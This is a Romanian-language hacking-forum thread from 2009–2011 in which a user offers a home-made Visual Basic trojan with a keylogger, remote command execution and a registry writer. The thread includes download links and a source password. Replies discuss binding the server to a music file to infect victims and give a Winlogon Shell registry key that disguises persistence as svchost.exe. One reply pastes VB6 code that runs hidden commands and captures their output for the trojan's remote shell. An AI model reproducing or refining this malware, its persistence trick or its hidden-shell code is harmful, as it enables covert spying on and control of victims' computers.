freshmeat Posted January 6, 2009 Report Share Posted January 6, 2009 FreshMeat's Trojan -Basic Filemanager-Process List-Keylogger-SendKeys-Registry Writer-Ghost Execute-Chat-Batch Script-Remote CMD (ceva de genu )-System Info (uptime , processor usage , win dir , user name comp name)-Balloon MessageScreen :Rezultat Virus Total :Download Rapid Share Quote Link to comment Share on other sites More sharing options...
zippy Posted January 6, 2009 Report Share Posted January 6, 2009 imi poti explica putin ce este optiunea Balloon Message Quote Link to comment Share on other sites More sharing options...
Nytro Posted January 6, 2009 Report Share Posted January 6, 2009 Dragut, felicitari. Dar nu imi plac cateva lucruri. Primul dintre ele ar fi numele. Cred ca se putea gasi un nume mai dragut, nu numele autorului. Pentru send keys folosesti functia SendKeys? Remote cmd afiseaza outputul? Iar la disk drives le puteai pune intr-un combo dupa ce le primeai din server. In rest imi place. Si daca poti sa adaugi transfer de fisiere ca nu e greu, trimiti pe bucati, citesti pe blocuri pe care le trimiti . Quote Link to comment Share on other sites More sharing options...
freshmeat Posted January 6, 2009 Author Report Share Posted January 6, 2009 (edited) Dragut, felicitari. Dar nu imi plac cateva lucruri. Primul dintre ele ar fi numele. Cred ca se putea gasi un nume mai dragut, nu numele autorului. Pentru send keys folosesti functia SendKeys? Remote cmd afiseaza outputul? Iar la disk drives le puteai pune intr-un combo dupa ce le primeai din server. In rest imi place. Si daca poti sa adaugi transfer de fisiere ca nu e greu, trimiti pe bucati, citesti pe blocuri pe care le trimiti .Mc nytro !In legatura cu numele troianului sincer nu am stiut ce sa pun ...aveti ceva ideei ?Cu winsock-ul sunt cam praf mai am de invatat Stii filemanager-ul nu este chiar asa de reusit dar stiu ca se putea si mai bine am inteles ideea cu combo stiu sa o fac dar nu am vrut sa ma mai complic si in plus cate drive-uri sa aibe da stiu un pic mai stresant Am postat si Sursa si daca cineva vrea sa implementeze si un file transfer nu am nimic in potriva ...Mai am de invatat si treaba cu filetransfer-ul ...la remote cmd nu e mare scofala face treab astaclient : trimite string-ul server : excuta string-ul ceva de genu : shell ("cmd.exe /c" string primit )ceva simplude exemplu daca dai dir nu iti afiseaza nimic nu am vrut sa ma complic stiu ca se poate ... poate la varianta 2 am sa fac cmd-ul mai util + un skin da folosesc sendkeys ... acum testati si voi va rog ...daca merg corespunzator combinatiile de taste alt + f4 , shift + f2 sau eu stiu ... aveti acolo ..La keylogger am o mica problema care m-a scos din sarite in ultima vreme i-mi trimite [enter] [enter] [enter] [enter] la infinit asa ca am scos enter-ul :) La keylogger folosesc GetAsyncKeyState ... dar stiu ca este si o metoda mai buna din cate am auzit eu ... ceva cu directx-ul ... nus nu am incercat ... corectati-ma daca gresesc ..Oricum o sa fie si varianta 2 mult mai buna ... Pentru un incepator in ale winsock-ului eu zic ca m-am descurcat bine ...@zippy :Balloon message : ii trimite victimei un mesaj sub forma de balon (asemanaqtor cu cel de la "update-ul semnaturilor virusilor de la nod 32" sau de la windows updates etc...)Aici aveti si sursa : Cam incalcita dar cred ca intelege lumea Download Visual Basic 6.0 SourcePassword : rstcenterDaca vreti si aveti ideei .. modificati sursa si postati modificarea aici ... Nu ma spupar daca ii puneti titlu by ion sau eu stiu cum nu ma deranjeaza dar toate modificarile vreau sa fie postate aici pe forum nu in alta parte . Multumesc ! Edited January 6, 2009 by freshmeat Quote Link to comment Share on other sites More sharing options...
andy95 Posted January 6, 2009 Report Share Posted January 6, 2009 am si eu o intrebare... serverul daca il bindez de o melodie sa zicem .. functioneaza ? adica se deschida sa pot ataca victima ? Quote Link to comment Share on other sites More sharing options...
Nytro Posted January 6, 2009 Report Share Posted January 6, 2009 Am intrebat de SendKeys pentru ca mi se pare ca nu functioneaza pe Vista, si trebuie sa folosesti API-ul SendInput cu care am avut o mica problema... Vreau sa fac in tutorialul meu File Manager si Send File, daca am putin timp cred ca o sa fac. Dar multe mai fac de la un timp . Tot zic ca fac si nu am mai facut nimic . Daca ai intrebari, daca te pot ajuta da-mi un PM Quote Link to comment Share on other sites More sharing options...
freshmeat Posted January 7, 2009 Author Report Share Posted January 7, 2009 am si eu o intrebare... serverul daca il bindez de o melodie sa zicem .. functioneaza ? adica se deschida sa pot ataca victima ?El este deja mascat dupa cum ai observat da cred ca poti sa il bindezi ...sau daca ai downloadat sursa troianului atunci uite si metoda de infiltrare :Download Quote Link to comment Share on other sites More sharing options...
xTwIsTx Posted February 28, 2009 Report Share Posted February 28, 2009 the limit is reached.! +mirror Quote Link to comment Share on other sites More sharing options...
Acidripp Posted February 28, 2009 Report Share Posted February 28, 2009 ErrorThis file is neither allocated to a Premium Account, or a Collector's Account, and can therefore only be downloaded 10 times.This limit is reached.To download this file, the uploader either needs to transfer this file into his/her Collector's Account, or upload the file again. The file can later be moved to a Collector's Account. The uploader just needs to click the delete link of the file to get further information.pune-o pe ftp (http://rstcenter.com/forum/showthread.php?p=87371#post87371) Quote Link to comment Share on other sites More sharing options...
freshmeat Posted May 20, 2011 Author Report Share Posted May 20, 2011 Download :Mirror1Mirror2 Quote Link to comment Share on other sites More sharing options...
ONes Posted May 22, 2011 Report Share Posted May 22, 2011 interesant , thx Quote Link to comment Share on other sites More sharing options...
Alexander33 Posted May 22, 2011 Report Share Posted May 22, 2011 am si eu o intrebare... unde se instaleaza si ce registry key modifica daca puti sa-mi spui...ca nu mai am vb06 si nu prea am timp sa-l instalez.... Quote Link to comment Share on other sites More sharing options...
freshmeat Posted May 23, 2011 Author Report Share Posted May 23, 2011 Se instaleaza in windows .Registry :[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell]Value = 'Explorer.exe c:\windows\svchost.exe'Ceva de genu .. . Quote Link to comment Share on other sites More sharing options...
me.mello Posted May 23, 2011 Report Share Posted May 23, 2011 Nu m-am uitat peste cod prin simplu fapt: -Remote CMD(cv de genu ) iar din functiile pe care le-ai precizat nu-mi dovedeste cu nimic faptul ca acest trojan nu se aseamana sau mai rau nu este o copie fidela a unor functii...din sutele de coduri dupa internet. Oricum ai facut treaba buna. Insa sa revenim la CMD, o sa- ti ofer un exemplu, nescris de mine, care se foloseste de una din cea mai des folosita functie de mine(CreatePipe), si preferata mea pe langa CopyMemory, Practic face redirect CMD output., nefolosindu-se de shellex sau ce functie oi fi scris tu acolo cu parametrii si tot.Daca esti inventiv poti face redirect catre client si viceversa,daca mai ai si experienta modifici si faci si spawn la shell catre client...totu tine de cat vb stii.In exemplul de mai jos, poti trimite comanda direct de la client catre server, iar output-ul sa fie trimis catre client(trebuie doar sa modifici nitel si sa-ti implementezi tu winsock cum stii. Eu sper sa te ajute pe viitor.Option ExplicitPrivate Declare Function CreatePipe Lib "kernel32" (phReadPipe As Long, phWritePipe As Long, lpPipeAttributes As SECURITY_ATTRIBUTES, ByVal nSize As Long) As LongPrivate Declare Sub GetStartupInfo Lib "kernel32" Alias "GetStartupInfoA" (lpStartupInfo As STARTUPINFO)Private Declare Function CreateProcess Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDriectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As LongPrivate Declare Function SetWindowText Lib "user32" Alias "SetWindowTextA" (ByVal hwnd As Long, ByVal lpString As String) As LongPrivate Declare Function ReadFile Lib "kernel32" (ByVal hFile As Long, lpBuffer As Any, ByVal nNumberOfBytesToRead As Long, lpNumberOfBytesRead As Long, lpOverlapped As Any) As LongPrivate Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As LongPrivate Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As LongPrivate Type SECURITY_ATTRIBUTES nLength As Long lpSecurityDescriptor As Long bInheritHandle As LongEnd TypePrivate Type PROCESS_INFORMATION hProcess As Long hThread As Long dwProcessId As Long dwThreadId As LongEnd TypePrivate Type STARTUPINFO cb As Long lpReserved As Long lpDesktop As Long lpTitle As Long dwX As Long dwY As Long dwXSize As Long dwYSize As Long dwXCountChars As Long dwYCountChars As Long dwFillAttribute As Long dwFlags As Long wShowWindow As Integer cbReserved2 As Integer lpReserved2 As Byte hStdInput As Long hStdOutput As Long hStdError As LongEnd TypePrivate Type OVERLAPPED ternal As Long ternalHigh As Long offset As Long OffsetHigh As Long hEvent As LongEnd TypePrivate Const STARTF_USESHOWWINDOW = &H1Private Const STARTF_USESTDHANDLES = &H100Private Const SW_HIDE = 0Private Const EM_SETSEL = &HB1Private Const EM_REPLACESEL = &HC2Private Sub Command1_Click() Command1.Enabled = False Redirect Text1.Text, Text2 Command1.Enabled = TrueEnd SubPrivate Sub Form_Load() Text1.Text = "ping"End SubPrivate Sub Form_QueryUnload(Cancel As Integer, UnloadMode As Integer) If Command1.Enabled = False Then Cancel = TrueEnd SubSub Redirect(cmdLine As String, objTarget As Object) Dim i%, t$ Dim pa As SECURITY_ATTRIBUTES Dim pra As SECURITY_ATTRIBUTES Dim tra As SECURITY_ATTRIBUTES Dim pi As PROCESS_INFORMATION Dim sui As STARTUPINFO Dim hRead As Long Dim hWrite As Long Dim bRead As Long Dim lpBuffer(1024) As Byte pa.nLength = Len(pa) pa.lpSecurityDescriptor = 0 pa.bInheritHandle = True pra.nLength = Len(pra) tra.nLength = Len(tra) If CreatePipe(hRead, hWrite, pa, 0) <> 0 Then sui.cb = Len(sui) GetStartupInfo sui sui.hStdOutput = hWrite sui.hStdError = hWrite sui.dwFlags = STARTF_USESHOWWINDOW Or STARTF_USESTDHANDLES sui.wShowWindow = SW_HIDE If CreateProcess(vbNullString, cmdLine, pra, tra, True, 0, Null, vbNullString, sui, pi) <> 0 Then SetWindowText objTarget.hwnd, "" Do Erase lpBuffer() If ReadFile(hRead, lpBuffer(0), 1023, bRead, ByVal 0&) Then SendMessage objTarget.hwnd, EM_SETSEL, -1, 0 SendMessage objTarget.hwnd, EM_REPLACESEL, False, lpBuffer(0) DoEvents Else CloseHandle pi.hThread CloseHandle pi.hProcess Exit Do End If CloseHandle hWrite Loop CloseHandle hRead End If End IfEnd SubDupa cum am spus exemplul de mai sus nu e scris de mine, desi ideea asta e veche si folosita de mine dinaintea acestui exemplu. Sper sa te ajute(mai mult de aici nici nu ar fi greu)...spun asta pentru ca la un trojan ce mi se pare cel mai interesant e accesul la un amarat de CMD, fie ca e redirect, sau spawned, fie el cu system privilege sau nu. Bine inteles ca oricand poti face hook catre un process si sa faci asta flawless....dar e foarte greu in vb, mai ales pentru tine...in stadiul asta.Cu asta fiind spuse, Felicitari. Quote Link to comment Share on other sites More sharing options...